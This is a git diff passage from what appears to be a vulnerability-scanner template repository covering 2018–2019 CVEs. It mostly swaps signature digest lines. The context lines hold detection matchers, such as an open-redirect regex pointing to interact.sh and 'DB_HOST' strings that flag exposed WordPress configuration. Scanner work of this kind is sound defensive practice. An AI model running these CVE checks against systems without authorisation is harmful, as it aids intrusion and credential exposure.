b/http/cves/2018/CVE-2018-7600.yaml @@ -74,4 +74,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202c09433a57c6712e699f69726c3d55bcae576db5d958bd870a26658faa84eee5022100e52e719b9b5648e1c146e206730d0123767549dfc51d8d2b29b58117fe595a4d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201914043df006e7871b073873357dcae4f895b022765c4548f30bd37913a42a90022100e87df0cac8b1777590d54b0a2e6c0da7893c61bac369032cfbc03ad74e2d287b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-7602.yaml b/http/cves/2018/CVE-2018-7602.yaml index 9c7e4cd6ad..fdc40e94e4 100644 --- a/http/cves/2018/CVE-2018-7602.yaml +++ b/http/cves/2018/CVE-2018-7602.yaml @@ -84,4 +84,4 @@ http: - '' internal: true part: body -# digest: 4a0a0047304502204dec12f369a9044e8dc3ba9c641723199442f60a3736e83f89caca37cd8118b5022100cda38fa6e52e8717c3073dff9123fc3707428e477982dd4549e372892f2a082e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202d2710f951db7f42ffbe35520feccb277f78e22dc8f10c354f2aa29edb7120e3022100da118a7c6946b7da9ed54ff1617399618c8a3fdce400375c4fe24cdd0c1838bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-7653.yaml b/http/cves/2018/CVE-2018-7653.yaml index d347ae0ded..4304af2aef 100644 --- a/http/cves/2018/CVE-2018-7653.yaml +++ b/http/cves/2018/CVE-2018-7653.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502200df73aa8ff0971cc80f47dd8d46f775cca36832a7ffa4d6c951b8503a4f9bf9f022100cf13ce4a2d6aaa51a72fc212a1d7dcd21c694f26d8614f626aeb56b566e7ed0c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220349646e629207f53dbcbac604439948f3417458e17708a75dc87c564d7dbbed20220177685393f75d3aba7c78cfb11674efa564bea05aae092ab681716d96cdde44e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-7662.yaml b/http/cves/2018/CVE-2018-7662.yaml index 1a19f074f3..d88b57a069 100644 --- a/http/cves/2018/CVE-2018-7662.yaml +++ b/http/cves/2018/CVE-2018-7662.yaml @@ -52,4 +52,4 @@ http: - "phpmailer.php on line 10" - "Fatal error: Call to a menber function add_event_listener() on a non-object in" condition: and -# digest: 490a0046304402207bc6bc4a86c8bf73bc4bc1fe83c3fb63108f1b1b77ac110b33a6af75a7a3a8ad02203036732893f9ba2208c741cd3a825d7d73f9870d11029f0c14d7098e0bc302cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c4460a818f60b488fc5c71aa9168516c7a2150f2545f52f51d1e70070b99845902207d25ed1c7daae64770f71a5d953448464b14770c12736d4eda9a5a7873141812:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-7700.yaml b/http/cves/2018/CVE-2018-7700.yaml index ea0c5bd4f4..4108c5e25d 100644 --- a/http/cves/2018/CVE-2018-7700.yaml +++ b/http/cves/2018/CVE-2018-7700.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100cdf514174881ec0aeaef7de181633cd9ae46dce268ed4262a00bc975b91084ad022100f1ab77a5571ee8bd0bdc0fbb0c8576f35706d726fd32db02369c00b362f8d857:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022004b883c8d19126ea1e29ef6a041ed23d893f36fc247f060356afa9e020f8acb8022100dd9ef2efefad420bbff52b8f3708925755b7fae6153ed9a43c26c795c5d76adc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-8006.yaml b/http/cves/2018/CVE-2018-8006.yaml index 3dcd0ed56b..7c5ec277eb 100644 --- a/http/cves/2018/CVE-2018-8006.yaml +++ b/http/cves/2018/CVE-2018-8006.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502200a0e6c89a7590f00b6b41f9c95276a493388e0d368986093d4f4a822895cd02a022100d5dfb7f525b41f7a51693c55344937d5db68f783b820ac4efc30ccbe6235bf76:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022010f10cc4688e28353a393c312e28aeef7a9ad41a7cf07e6a10812e8f60eb4066022100d5392973491ba3d359ac52e1e3ca8e4e61c1dee7a80e84be49b71416ed17e8a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-8033.yaml b/http/cves/2018/CVE-2018-8033.yaml index 851c9e01e0..966921ddf1 100644 --- a/http/cves/2018/CVE-2018-8033.yaml +++ b/http/cves/2018/CVE-2018-8033.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210082dab42d8df11cef427da8f19b687fc19ea3514fcc689610b9f0ab8a7f82c97e022100a8053d51f59aae056907324176a4898da614bd38c1fa07ebbd608b924a1baf56:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206ecea4e629ad9e17c58a766f9588495d12fcf7ddbc84d3fa34fd478c83258814022100f71e483743b5475d9c6cfb08a5c136c79e2487c7328ac1d395c9aca893266fad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-8715.yaml b/http/cves/2018/CVE-2018-8715.yaml index c2250d7fb5..074d7c15f3 100644 --- a/http/cves/2018/CVE-2018-8715.yaml +++ b/http/cves/2018/CVE-2018-8715.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022005d455efc5652978e6ce03467a2fdc9063fa8b000a45eafb0302fc5d0bd2237902205f0c0f61bf8b26e05992a876e05e7b5191f3ca30dc15e835eb036d08ee54b69d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bd663b7b04de0ea4a75d80e8408f1c23c06cd76abfcc8ee02a4a88cbb5fbc1bb02210087cb7563d692efc05acb93bf5ba46ba22a41a4493c29430d79e08c9dce089128:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-8719.yaml b/http/cves/2018/CVE-2018-8719.yaml index 17e6c6f48a..77877699e9 100644 --- a/http/cves/2018/CVE-2018-8719.yaml +++ b/http/cves/2018/CVE-2018-8719.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502200bfe6f271147b79d93d598268d4cffdb5892583d30dbcada1cad9f7e1a973909022100ff263587c52e3feb5e26514030f4ca8dc8913cc3a31be0a13a140142eeda44c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100cff403ec1d7c36ecd087e8a3ba798a05ec77bfa1764aa2b89e571033cee6695302203bf9a256c6c4dec931e05a4c519c00c937217f97ab2aeccbf09f12ec9344c59a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-8823.yaml b/http/cves/2018/CVE-2018-8823.yaml index 031c8b8b47..342b8ce4f8 100644 --- a/http/cves/2018/CVE-2018-8823.yaml +++ b/http/cves/2018/CVE-2018-8823.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b0293837a55f3a251897629158fe5d2fc0baabc8824ac948a8ecd7fbbe466b940220586a05c494ae966678dbafb3551788c080d1e7048f1b2956ee027fb4b9f9549c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210089a37a72b700ed30f6f4af4d738ea62aec25bbd5d92c9e5d298a3f82136a3e87022100a985aafcb505a8df88d1070cdc302c358244facdf48a006b3b1c0b253e3c2da2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-9118.yaml b/http/cves/2018/CVE-2018-9118.yaml index e598e0a524..1ce0f465fa 100644 --- a/http/cves/2018/CVE-2018-9118.yaml +++ b/http/cves/2018/CVE-2018-9118.yaml @@ -46,4 +46,4 @@ http: - "DB_HOST" - "The base configurations of the WordPress" condition: and -# digest: 4b0a00483046022100d6d3b6187f774e9c2146fd3b53f488bcac19a3f11bcba527c546f24479ab6057022100a42013e5cd5cb9001d5e8f6a8d82fd0296023000fcba05bc258bbdd09c0e29bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220015beb169f06bde24fa211fe065c528759c245a5978b7aab3ecf489647f6b127022100b7604378240ccca7a0d322d620e27549216b34324349d21da959b1bd303f92e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-9205.yaml b/http/cves/2018/CVE-2018-9205.yaml index 250b3b302f..178a79cf49 100644 --- a/http/cves/2018/CVE-2018-9205.yaml +++ b/http/cves/2018/CVE-2018-9205.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d98eaf7bdbf1caeef48de5f5a88053a8dd8b7f572cf99ebc17107d3947319137022100e3cd28b30507fa2595935375a05b182a0d677afceeabff1809f5d6f940487ab0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022015c6fc8c65e4fa4c70222b3c525ce111e879f4bd4c3cf44448d4f92fa66068d00220358421623f4cfbc1779acbc2ecddbe2ea1174b321df7ce8130aae2fdc107b9ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-0193.yaml b/http/cves/2019/CVE-2019-0193.yaml index 4b9aea984e..83b03912fd 100644 --- a/http/cves/2019/CVE-2019-0193.yaml +++ b/http/cves/2019/CVE-2019-0193.yaml @@ -67,4 +67,4 @@ http: regex: - '"name"\:"(.*?)"' internal: true -# digest: 4a0a00473045022100812bfeee2c8b417abe9a230dec3d7580ed762ca6e526dde72faf88c49062dad1022016ceded74fa64abfcf6b52aadca41a3a82ff453e7823b6b89ba3531cd4030a63:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205bcaabde2cb2ce6143465b21d835940f816432250b2f34f593fe713de3f37b6302206c592f558533678f62e8169a0e959bf0717a04b8dbcae72f18caf6ec18da9c9a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-0221.yaml b/http/cves/2019/CVE-2019-0221.yaml index c102db69ea..4e292cc145 100644 --- a/http/cves/2019/CVE-2019-0221.yaml +++ b/http/cves/2019/CVE-2019-0221.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220338012c936f08bbf4397c9221d081cc7cdc2ccff4bea3fe855723ec3f90e0c020221009f9036c094abfbc759d859cfccbdc9d221f992816c2ad27d461c6264bd74f09e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009b5e693d9c11510046258658cf64d0bed4e7e351d300cec6fc9c91b15a218950022072ace8ff86b9cfd8ffea3c1d9bdf57b096a78bd39c40d02f3b238f80500964ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-0230.yaml b/http/cves/2019/CVE-2019-0230.yaml index c652f6af37..4070e89092 100644 --- a/http/cves/2019/CVE-2019-0230.yaml +++ b/http/cves/2019/CVE-2019-0230.yaml @@ -44,4 +44,4 @@ http: part: body words: - "{{str}}16384" -# digest: 4a0a00473045022100dc3f9eb4ddc3ee9f4358b97c25b2e19f64754b2a6ab4e908f3cd5e6b3abe856902201c8b19054aa21ce2de57af88dcef93933f942b8b7a61bb0d878cf24a39a7353c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204bf4ab1a8374aeb43f677f37418bc1bd76186cc51614ed4823ee79b554de1622022013657af873e57d6a8cbdb6772fab359e1d83cfa3adcd3cd4b291a06dde328ba2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-10068.yaml b/http/cves/2019/CVE-2019-10068.yaml index 450d51d916..4c0317495b 100644 --- a/http/cves/2019/CVE-2019-10068.yaml +++ b/http/cves/2019/CVE-2019-10068.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 500 -# digest: 4b0a00483046022100a7dcdd6513c019b521381c8555d14a10f5e9a723507439a20ff452fc1feb73fe022100f1d272fcdc74b59eddcf782b5c40bbfb75f55fdd2b97dd823c3dd3820646d82d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fb255020353bac7f6f491e89641dff7f941be863f5658d7bc1968ef8fb54ecfd022100f45638cb71429977b943ddd9dd3a9a5cdaa86becae79b42f3f43266dea8aeabd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-10092.yaml b/http/cves/2019/CVE-2019-10092.yaml index 20f33b0bd3..5e0400ae6b 100644 --- a/http/cves/2019/CVE-2019-10092.yaml +++ b/http/cves/2019/CVE-2019-10092.yaml @@ -39,4 +39,4 @@ http: - type: word words: - "" -# digest: 4b0a00483046022100cf7b74757369fdca2726f4be8043d410911a61a6ff57c674a2fdea6db7e5ff72022100b31692e88e01fa8ac9c6e6ade337723ae79cab3ee421101a31b483f51497a1b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fe06ef219910cb21377ede6e43897e9d1ba840a59568b50da8ada8b648d780d4022100d5d67b48a8bfbc03e42ed70988267121fe056df8f26288784a7bef6bb0a65f52:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-10098.yaml b/http/cves/2019/CVE-2019-10098.yaml index 1cf3fb43e7..2e00f421b2 100644 --- a/http/cves/2019/CVE-2019-10098.yaml +++ b/http/cves/2019/CVE-2019-10098.yaml @@ -42,4 +42,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' -# digest: 490a0046304402206d5acc648046711517cfb9e2cf0cdb4c15233662233ff46aef2ea399f5a42f3b02204bbcd1901f2966465782ae4bb1a89811265aa66156c599bfd42c96706453fa92:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e01b48fe0207c14f780bac9919a035df55337e8ca43bba6da5a3d18cd046698202201f46c8762e584f6deab72e836d638c31eb0c298c93ba3e5f0f0e2d6121f8bb75:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-1010290.yaml b/http/cves/2019/CVE-2019-1010290.yaml index 7df027d093..480d8f8958 100644 --- a/http/cves/2019/CVE-2019-1010290.yaml +++ b/http/cves/2019/CVE-2019-1010290.yaml @@ -38,4 +38,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4a0a00473045022100b71c92a9f51a31a95aa5feb9fbd9abdd3e07ddd18f08fc48e5de15cacded85a8022022154cf34629f7d798927258f4c611a5395a1f7bb5970e12b034e5c20f269684:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220627139c3cb938a7d7eba04d718744e16fd6aafe8a2a1cf44653c9ddaac1261ab022100e582c6f7eac458309456c6516ef964bfe5f5322d43dcacd800d796a08b68de83:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-10405.yaml b/http/cves/2019/CVE-2019-10405.yaml index 4a739d8006..c3d9302ed4 100644 --- a/http/cves/2019/CVE-2019-10405.yaml +++ b/http/cves/2019/CVE-2019-10405.yaml @@ -64,4 +64,4 @@ http: - type: kval kval: - x_jenkins -# digest: 4a0a00473045022100d3c00480594e335316512607e1730e0f4b99e755cd744fc506c049036dbe4696022000afd5caaf07abf1dbe8d051503772a11975ed7d5bd15940e71c63a569ad63bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f4be7b8a859751b37e854ba92cbebfa38e7ab814389f5b2dd24df7697b7c16e4022100d799b43c6d6ff75cf10ee409dbf6d93a8c3fa0093abebb378d2517eaffc1ee38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-10475.yaml b/http/cves/2019/CVE-2019-10475.yaml index e665e9a158..e1c4c774d4 100644 --- a/http/cves/2019/CVE-2019-10475.yaml +++ b/http/cves/2019/CVE-2019-10475.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100dc94a63bb9257fa228726bcf29cfbe0a229e465f764ac1171e35d57315a944a0022100beb7f2b019f71c9fd84a9f74a5d739377d1e70541ae889c8f961a6aea511ad68:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200729f4979c6f6a749656ff66f3a90159ab17e28e5e9f1a518922efedb2b9f2cd022078c9ac664f0bf3ac9ab19dba77d87c09cd81caad0f19fd1a9148232c74aaf571:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-10692.yaml b/http/cves/2019/CVE-2019-10692.yaml index ef67bb90de..bcd21ce3cf 100644 --- a/http/cves/2019/CVE-2019-10692.yaml +++ b/http/cves/2019/CVE-2019-10692.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c806b890a97e99051ab9b8870e02ada13436f59da4752594ce9b67a1128d22d40220703e18d56fabf954d54d723644533979ffb22a19e26d64263430140e7f069c9d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c30b059669a67c82b43bde48f994bfc70f0442104ff816480cde0dbd3d486f6e02205020c6d8f3218d83eafe8bbd2f06bd6a7326e45413d38d70a695cf805d7feba2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-10717.yaml b/http/cves/2019/CVE-2019-10717.yaml index e65cb1cb15..5911a3c978 100644 --- a/http/cves/2019/CVE-2019-10717.yaml +++ b/http/cves/2019/CVE-2019-10717.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e9835e960c185d264844ff6a1c0dcc4461f0848d00e894bb0681a656b4939db90220223530414a1d116e03bae637ebc7a0b6037ac08c0f2daee019cd5fc664d2e36f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008bc2a6df1ec661a1e058c80095a0bfb21803e5447c6ceb17f9238779c6efbe4902203cb9d1f4f1eaf708d7dd3286ed6feb15b39cf39f9de095868c2341cf5c89b294:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-10758.yaml b/http/cves/2019/CVE-2019-10758.yaml index 7ce8d1d121..23624a316b 100644 --- a/http/cves/2019/CVE-2019-10758.yaml +++ b/http/cves/2019/CVE-2019-10758.yaml @@ -46,4 +46,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 4b0a004830460221008b43b36836d54fe57119d7fbc9c2c7bbf83a5c28c40a75eb6347457778a45bc6022100fe8bb104228123301a28b551a1badd14112e0aa18bce53387295571b79c7b827:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a707efd5a953cf498f2407da8a60502b15729c8d513a8cb3e79e4f4f57543a0002206ff1e0d4933305bd33073eb3ca571d6380e0dc8b505e4eaf9d9e0e91e94a231b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-11248.yaml b/http/cves/2019/CVE-2019-11248.yaml index e7c00106fb..788e9a272d 100644 --- a/http/cves/2019/CVE-2019-11248.yaml +++ b/http/cves/2019/CVE-2019-11248.yaml @@ -47,4 +47,4 @@ http: - "Profile Descriptions" - "goroutine profile: total" condition: or -# digest: 4b0a00483046022100fd3a732a5da554e6fb8171ff8f9c6848079e0878dea0e8bf1909ca7be3a448d2022100adf7b0864a3243dd674f556d97fb7a081a16d4ce39b692f5b16f6d35ec27a88f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008307f1d7a94f3bf164d4fb3a0599e4cf664f8e1c5994402b7151828239d8620c0221009ab7757064a2377254097cea5be5f4f40b96bb2557bdee8b64b829868e174d41:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-11370.yaml b/http/cves/2019/CVE-2019-11370.yaml index 4fd05aa3b9..5930885d19 100644 --- a/http/cves/2019/CVE-2019-11370.yaml +++ b/http/cves/2019/CVE-2019-11370.yaml @@ -51,4 +51,4 @@ http: - status_code_2 == 200 - contains(body_2, 'value=\"\">\">') condition: and -# digest: 4a0a0047304502206211cfa838795769776a00d7ccfcedaa1fe50255fc01e8f945c461b0d2ebc946022100f37746cb8f51e8f7d78c8730d26614a8b2ffc9a7d999c013d5b875cf3568d608:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201c728c57bdcdc9cd92977cc33c30494b57946183df9ea04437e0df5b41638d89022100cffb3e6dd98eaffb837966fd33cdf1421419846ce3a29c12cdaa671e97f80c05:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-11510.yaml b/http/cves/2019/CVE-2019-11510.yaml index 8b516e4f70..68d3c30a9a 100644 --- a/http/cves/2019/CVE-2019-11510.yaml +++ b/http/cves/2019/CVE-2019-11510.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202dcf9c8572b6ee91dac5f3ab4c1748f9ba06112c38e8ba379b6e68e8eea105f3022100cd34629941d13b282b1e311019a5e8172e4f0a261d94843a22b27fb7a8826159:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203cb09d5fcff94c6163b87658b3fdc7e6e18e972e859425a541c521543a2e5f2b022100e5e8e743f385d0126a8f435ef7dd64fdf54130d31f622f09bef068fbfc616479:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-11580.yaml b/http/cves/2019/CVE-2019-11580.yaml index 754a2e87d6..05f9053070 100644 --- a/http/cves/2019/CVE-2019-11580.yaml +++ b/http/cves/2019/CVE-2019-11580.yaml @@ -55,4 +55,4 @@ http: part: body_2 words: - "CVE-2019-11580" -# digest: 4b0a0048304602210087955d2448b57d1674ba2fbc9cc961254714818eba35f3288e5a4e190207809a022100d70c8dd4f92da6f2313c05a0892674a2e32c0c3385b8c14e5f18b2586c539e7a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022041cb8583d3f8e34fbfe33e0f61f16e001d07115f9593dfe40982073ffe5f80b8022100d8bb2eec2234f2e5a9dbc238f7012258efb9b891681e9f41bbe8c3e143cb4201:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-11581.yaml b/http/cves/2019/CVE-2019-11581.yaml index a5be14e8d9..89c27951ee 100644 --- a/http/cves/2019/CVE-2019-11581.yaml +++ b/http/cves/2019/CVE-2019-11581.yaml @@ -62,4 +62,4 @@ http: - "\\(v8\\.1\\.[0-1]" - "\\(v8\\.2\\.[0-2]" condition: or -# digest: 4a0a00473045022100b8e0de54aed749444c2182e9e8df595b8e8f1a50ba0d84fee8f9f6208dada7b102201a3f6e5736aacbacc91733a76b2fcb238b12a3bec104a4dcffd701f184768a00:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b5ac1e14381166de97a1fb5d0d4fa2e6d14a5382cf7a596bb2be5dec8b03761202203e1f85de72109b051c2acee04d0edab5ed7a0bb001331179d9357b4cc055e67b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-11869.yaml b/http/cves/2019/CVE-2019-11869.yaml index b5445d9d4e..149005e931 100644 --- a/http/cves/2019/CVE-2019-11869.yaml +++ b/http/cves/2019/CVE-2019-11869.yaml @@ -57,4 +57,4 @@ http: - type: dsl dsl: - "contains(tolower(header_2), 'text/html')" -# digest: 490a0046304402204d1e26a17c4c30a25c984812d74e5863ff9d46141c09b202bb77c1c5e95369a90220692d2ab1de65d05ad3b83a893a6eabc518043b83316e91e6225e9f63f2dcad03:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f262415dcc61709d8131f774eb669f755f68c700968d3fa28706ed6b3e1cef040220617983e4d93971bf21800af6aa075e295f45b1217ea3c05fb47153aefa81d3f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-12276.yaml b/http/cves/2019/CVE-2019-12276.yaml index b5dc0db698..e61a26d436 100644 --- a/http/cves/2019/CVE-2019-12276.yaml +++ b/http/cves/2019/CVE-2019-12276.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ed5135175a98f71186c5dfe65254ca6307c8c54583b3ef526433db71574580c4022041e92690d7525a07a6120de8ae4ea7462a9868f3772edaf6fe7c8e5b048afd0a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d79827ba491b0d96d375a299b5239c4c2e7065dd9a8f41fdb5b3baeb6690865202203e91ce0af756b9de8bdacf00cf9fe65c9eda47bac6ace557a6924309a40b0947:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-12314.yaml b/http/cves/2019/CVE-2019-12314.yaml index aa7c64d4e5..9433febad9 100644 --- a/http/cves/2019/CVE-2019-12314.yaml +++ b/http/cves/2019/CVE-2019-12314.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b2faeeee543d7c4ff6ad4632ed8ce70fb61371a60376b204ba85deff2bdd0071022100bcf2aa3b7ffcf09b9ddbff16e39f9ae4e5530c95fbbd8ace8f5da573a4b42cf2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f8257d6e12f86661aec5ea17cfa1c2a16cd2b05525986b0c13bb14d13018680a022100e4ce69c9d1d8ffb01a46ef08a0083db051f8f2284ee81bf0c4f29e8ad2ce8006:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-12461.yaml b/http/cves/2019/CVE-2019-12461.yaml index 1700cae404..ba31b35130 100644 --- a/http/cves/2019/CVE-2019-12461.yaml +++ b/http/cves/2019/CVE-2019-12461.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f9634b71c6a62a98f977a12added6fccaa1c24cf0e75ffb403873dc58ba27913022100eaeb1db10c77254a2093b03dd50f1366f6d6d8a87478eba48cf05b02f8f090db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f8a68184a00bd30b2c7e8380fe2352c186c6408c83372b7c32cec79a0e41f3b6022029e2365306b2fed019cbf46e02ce63203a3c5e4672286b5e08367bf26cc52b1e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-12581.yaml b/http/cves/2019/CVE-2019-12581.yaml index f374f8f3ba..e699734f44 100644 --- a/http/cves/2019/CVE-2019-12581.yaml +++ b/http/cves/2019/CVE-2019-12581.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402202bbcd24325d27b4afa9692a47676116c3e746dac9efb6781eca7200bedd46d5c02203e77b6aa27e9da81a381ac8a93047e7dfe379956ebf9a6b0196e58a7150cb1a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207df5ca90186e8dda1fb2ff710a5b1d4faf3c9698a8d966deed30f42731041cba022100f8e38bd0ce4a0a5cd08d6f26c7b53c4797698bc653e1c271e553f9aba66f650f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-12583.yaml b/http/cves/2019/CVE-2019-12583.yaml index f714adf68b..fa0c8c7f05 100644 --- a/http/cves/2019/CVE-2019-12583.yaml +++ b/http/cves/2019/CVE-2019-12583.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a12874f0ef2733bc8c7f0e764fb0ca6289dcb56f72499b238b27b09caf888bb8022100db48c204ba56cf97ad35c36b148a21decd86e83cd35614cb546190faea932e61:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100da95f96df8b02e3a3ca8944e40f53c435f74bfaa6f293914ad188b043039589f0220689afc3f9f73c9abb15601bdf592167a472181186999990a87fadd16576dd62a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-12593.yaml b/http/cves/2019/CVE-2019-12593.yaml index 12f99354c1..51fcfdcb65 100644 --- a/http/cves/2019/CVE-2019-12593.yaml +++ b/http/cves/2019/CVE-2019-12593.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221008a481705db6d037ce5f8778e45effa8d6e32a5fb048e8e395ec718c9d093875a022010e39ff22300fc22de65d341cea7fb009e75f65dd8ddba32e9d1b68e6ec722a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100cb5f9fd84b6fb0218b4458e70c04a15e0a75972da3b7226533adf711515f9f3c022028463f9c2412fb63c6ddfef8c71b84042b08c5a1ee379f741f9e27e242df6d51:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git 